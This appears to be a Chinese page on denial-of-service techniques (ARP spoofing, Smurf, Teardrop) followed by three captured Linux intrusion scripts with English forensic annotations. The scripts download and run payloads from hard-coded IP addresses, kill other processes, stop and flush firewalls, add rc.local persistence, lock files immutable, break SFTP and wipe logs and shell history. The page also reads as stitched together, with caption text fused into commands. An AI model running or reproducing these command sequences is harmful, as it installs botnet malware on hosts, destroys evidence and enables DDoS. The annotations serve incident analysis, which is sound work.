基于ARP
ARP是无连接的协议,主机收到攻击者发送来的ARP应答时,不会验证其真实性,而是直接接受应答包中所提供的信息并更新ARP缓存。因此,含有错误源地址信息的ARP请求和含有错误目标地址信息的ARP应答均会使上层应用忙于处理这种异常而无法响应外来请求,使得目标主机丧失网络通信能力,产生拒绝服务,如ARP重定向攻击。
基于ICMP
攻击者向一个子网的广播地址发送多个ICMP Echo请求数据包,并将源地址伪装成想要攻击的目标主机的地址。这样,该子网上的所有主机均对此ICMP Echo请求包作出答复,向被攻击的目标主机发送数据包,使该主机受到攻击,导致网络阻塞,如Smurf攻击。
基于IP
TCP/IP中的IP数据包在网络传递时,可以分成更小的片段,到达目的地后再进行合并重装。如果分片重组过程的实现存在漏洞,缺乏必要的检查,攻击者就可以利用IP报文分片重组时的重叠现象攻击服务器,进而引起服务器内核崩溃。Teardrop就是这类基于IP的攻击。
基于应用层
# Analyst annotations for the captured command sequence the page labels
# "example 2". The commands are kept exactly as the page prints them; the
# comments describe what each step does and which artifact it leaves behind.
# NOTE(review): the curly quotes further down are presumably a rendering
# artifact of the page; a shell would not treat them as quoting characters.

# Both package managers are tried, so the same paste works on Debian-style and
# RPM-style hosts; one of the two commands fails on any given system.
例子2:apt-get install curl
yum install curl
# Fetches a payload from a hard-coded IP:port into /tmp/gfty. The URL and the
# file path are both usable as indicators.
curl http://121.40.175.22:15651/95 -o /tmp/gfty
# killall -I matches process names case-insensitively, -q suppresses the
# "no process found" message. The name list mixes names that look like other
# bots (DDos64, dos32, IptabLes, IptabLex, ...) with names of legitimate
# software (mysql, perl, udevd, netstat), so unrelated services on the host
# can die at this point. Presumably the intent is to evict competing malware
# -- not verifiable from the page.
killall -I -q Linux6 ifconf 123
killall -I -q LAdmins Admins asxper
killall -I -q g251 koiu winsx synlinshi
killall -I -q mysql sysyang ifconfigethO whoami ifconfigetho
killall -I -q gmetad cvn hanx .xdsy hssa ggu ggy gg azda .sshd bashpa
killall -I -q sshpa udevd .SSH2 .SSHH2 nhgbhhj zl pro proh DDos64 DDos32
killall -I -q dos64 dos32 sfewfesfs sfewfesfsh IptabLes tangwe IptabLex
killall -I -q .IptabLes .IptabLex 1 perl System Admins Linuxsys System32 rus
# NOTE(review): "-an" looks like a pasted "netstat -an" fragment; killall will
# parse it as an option or signal rather than a process name -- TODO confirm
# how the installed psmisc version reacts.
killall -I -q sql tel netstat -an ddos32_64.64 Admins koiu 315 64 udp
killall -I -q koi Chinesepoli 508 topsing weige udp
# Second download path for the same URL and destination, this time with wget
# (-c resumes a partial file, -O sets the output path).
apt-get install wget
yum install wget
wget -c -O /tmp/gfty http://121.40.175.22:15651/95
# Makes the payload executable and starts it three ways: by absolute path, by
# relative path (only works if the working directory is /tmp, which this
# listing never sets), and detached with nohup with all output discarded.
chmod 0755 /tmp/gfty
/tmp/gfty
./gfty
nohup /tmp/gfty > /dev/null 2>&1 &
# Persistence: appends two lines to /etc/rc.local. Unexpected trailing lines
# in that file referencing /tmp are the artifact to look for.
echo “service gfty”>>/etc/rc.local
echo “/tmp/gfty”>>/etc/rc.local
# Sets the immutable attribute, so a plain rm of the payload fails; lsattr
# shows the flag and chattr -i has to be run before the file can be removed.
chattr +i /tmp/gfty
# Uninstalls the download tools that were just used. Package-manager logs
# showing curl/wget installed and removed within minutes are a timeline marker.
apt-get -y remove curl
yum -y remove curl
apt-get -y remove wget
yum -y remove wget
# Clears the terminal and the current shell's in-memory history list.
clear
history -c
# Analyst annotations for the captured command sequence the page labels
# "example 3". The commands are kept exactly as the page prints them; the
# comments describe what each step does and which artifact it leaves behind.
# NOTE(review): the curly quotes in the find/awk lines are presumably a
# rendering artifact of the page.

# Everything relative below (find ./, ./aa, ./17230) resolves under /tmp.
例子3:cd /tmp
# Stops the host firewall service.
service iptables stop
# Deletes the system-wide crontab; a missing /etc/crontab is a direct artifact.
rm -rf /etc/crontab
# /usr/bin/bsd-port is not a standard directory; presumably this removes a
# previously installed competing bot -- verify against the host. The killall
# matches by name, so legitimate getty processes are killed as well.
rm -rf /usr/bin/bsd-port/getty
rm -rf /usr/bin/bsd-port/*
killall -9 getty
# Deletes files named S90* below the current directory, sparing names that
# contain S90single, reboot or S90halt. The names resemble SysV init links;
# what they are on the victim host is not shown on the page.
find ./ -name “S90*” | grep -v S90single | grep -v reboot | grep -v S90halt |xargs rm -fr
# Sends SIGKILL to every process whose parent PID is 1, except ps lines that
# contain "ssh". On a normal host that is most daemons, so a simultaneous
# outage of many services marks the time this ran.
ps -ef | grep -v ‘ssh’ |awk ‘{if ($3 == 1) print $2}’ | xargs kill -9
# Installs wget, then downloads two payloads from the same hard-coded host
# into /tmp, makes them world-writable and executable (777) and runs them.
yum -y install wget
wget -c http://222.186.34.174:9655/aa
chmod 777 aa
./aa
wget -c http://222.186.34.174:9655/17230
chmod 777 17230
./17230
# Inserts DROP rules for a list of source addresses at the top of the INPUT
# chain. The purpose of the list is not stated on the page; presumably it
# shuts out other operators or scanners. Rules are runtime-only here (no save
# command appears in the listing). Several addresses are repeated
# (107.160.46.234, 123.184.16.119, 61.174.49.203) and one entry is a /24, so
# a ruleset containing this exact set is a recognisable fingerprint.
iptables -I INPUT -s 116.31.123.159 -j DROP
iptables -I INPUT -s 183.60.110.74 -j DROP
iptables -I INPUT -s 122.224.32.32 -j DROP
iptables -I INPUT -s 149.56.107.161 -j DROP
iptables -I INPUT -s 104.223.10.48 -j DROP
iptables -I INPUT -s 178.170.68.69 -j DROP
iptables -I INPUT -s 158.69.219.235 -j DROP
iptables -I INPUT -s 164.132.170.78 -j DROP
iptables -I INPUT -s 149.202.219.49 -j DROP
iptables -I INPUT -s 124.16.31.156 -j DROP
iptables -I INPUT -s 183.61.171.149 -j DROP
iptables -I INPUT -s 61.157.167.74 -j DROP
iptables -I INPUT -s 119.63.44.35 -j DROP
iptables -I INPUT -s 42.51.23.80 -j DROP
iptables -I INPUT -s 104.129.35.178 -j DROP
iptables -I INPUT -s 103.31.240.133 -j DROP
iptables -I INPUT -s 100.42.227.29 -j DROP
iptables -I INPUT -s 107.160.46.234 -j DROP
iptables -I INPUT -s 222.186.34.73 -j DROP
iptables -I INPUT -s 36.249.123.134 -j DROP
iptables -I INPUT -s 118.193.214.160 -j DROP
iptables -I INPUT -s 104.37.213.35 -j DROP
iptables -I INPUT -s 58.54.39.51 -j DROP
iptables -I INPUT -s 23.247.5.12 -j DROP
iptables -I INPUT -s 23.247.5.11 -j DROP
iptables -I INPUT -s 51.255.84.218 -j DROP
iptables -I INPUT -s 98.126.8.114 -j DROP
iptables -I INPUT -s 222.174.5.13 -j DROP
iptables -I INPUT -s 123.184.16.119 -j DROP
iptables -I INPUT -s 103.214.169.184 -j DROP
iptables -I INPUT -s 103.236.220.90 -j DROP
iptables -I INPUT -s 103.55.25.57 -j DROP
iptables -I INPUT -s 103.55.26.91 -j DROP
iptables -I INPUT -s 104.223.6.159 -j DROP
iptables -I INPUT -s 107.160.46.234 -j DROP
iptables -I INPUT -s 111.160.17.8 -j DROP
iptables -I INPUT -s 114.112.27.83 -j DROP
iptables -I INPUT -s 115.231.219.34 -j DROP
iptables -I INPUT -s 115.28.206.48 -j DROP
iptables -I INPUT -s 116.31.116.28 -j DROP
iptables -I INPUT -s 117.18.4.110 -j DROP
iptables -I INPUT -s 122.225.102.131 -j DROP
iptables -I INPUT -s 123.184.16.119 -j DROP
iptables -I INPUT -s 14.29.47.15 -j DROP
iptables -I INPUT -s 149.202.210.93 -j DROP
iptables -I INPUT -s 180.97.163.228 -j DROP
iptables -I INPUT -s 183.60.0.0/24 -j DROP
iptables -I INPUT -s 183.60.110.83 -j DROP
iptables -I INPUT -s 183.60.149.196 -j DROP
iptables -I INPUT -s 183.60.149.199 -j DROP
iptables -I INPUT -s 183.61.171.147 -j DROP
iptables -I INPUT -s 198.44.177.102 -j DROP
iptables -I INPUT -s 204.44.67.19 -j DROP
iptables -I INPUT -s 23.234.25.143 -j DROP
iptables -I INPUT -s 23.234.28.85 -j DROP
iptables -I INPUT -s 51.255.66.195 -j DROP
iptables -I INPUT -s 58.218.200.111 -j DROP
iptables -I INPUT -s 61.160.195.78 -j DROP
iptables -I INPUT -s 61.174.49.203 -j DROP
iptables -I INPUT -s 66.102.253.30 -j DROP
iptables -I INPUT -s 66.249.65.123 -j DROP
iptables -I INPUT -s 115.231.17.7 -j DROP
iptables -I INPUT -s 61.174.49.203 -j DROP
# Each "echo> FILE" overwrites FILE with a single newline, so login records
# and system/web/auth logs end up one byte long. Logs already forwarded to a
# remote collector are unaffected and are the place to recover the timeline.
echo> /var/log/wtmp
# The path below has no leading dot, so /root/.bash_history is not touched by
# this line; it may still hold the commands typed before this point.
echo> /root/bash_history
echo> /var/log/syslog
echo> /var/log/messages
echo> /var/log/httpd/access_log
echo> /var/log/httpd/error_log
echo> /var/log/xferlog
echo> /var/log/secure
echo> /var/log/auth.log
echo> /var/log/user.log
echo> /var/log/wtmp
echo> /var/log/lastlog
echo> /var/log/btmp
echo> /var/run/utmp
# Clears the current shell's in-memory history list and ends the session.
history -c
exit
# Analyst annotations for the third captured command sequence on the page
# (its first line is fused with the page's caption text). The commands are
# kept exactly as printed; the comments describe what each step does and which
# artifact it leaves behind.

# The same five firewall commands appear three times in a row. They stop the
# firewall through several distro-specific entry points and then flush all
# iptables rules. NOTE(review): "reSuSEfirewall2" is possibly a mangled
# "rcSuSEfirewall2" -- TODO confirm.
来一张DDOS控制面板/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
iptables -F
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
iptables -F
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
iptables -F
# Clears the immutable flag on wget and restores its execute permission, which
# implies wget had been locked before this ran (by whom is not shown).
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
# Downloads a payload from a hard-coded host into /bin/zz (-P sets the target
# directory), makes it executable and starts it detached, output discarded.
# An unpackaged binary in /bin is the artifact; the package manager's verify
# function will not list it as owned by any package.
wget -P /bin/ http://43.230.144.65/zz -c
chmod 0755 /bin/zz
nohup /bin/zz > /dev/null 2>&1 &
# Re-applies the immutable flag to wget.
chattr +i /usr/bin/wget
# Strips all permissions from the SFTP server binary and makes it immutable,
# which breaks SFTP file transfer on the host. Failing SFTP logins together
# with mode 0000 and an "i" flag in lsattr output is the symptom to check.
chmod 0 /usr/libexec/openssh/sftp-server
chattr +i /usr/libexec/openssh/sftp-server
# Overwrites login and system logs with near-empty content.
# NOTE(review): the curly quotes are presumably a rendering artifact.
echo ‘ ‘ > /var/log/wtmp
echo ‘ ‘ > /var/log/lastlog
echo ‘ ‘ > /var/log/messages
# Points the history file at /dev/null so this session's commands are not
# written out when the shell exits.
export HISTFILE=/dev/null
# Deletes wtmp and the .bash_history in the current directory (which directory
# that is, is not shown), then clears the in-memory history list.
rm -f /var/log/wtmp
rm -f .bash_history
history -c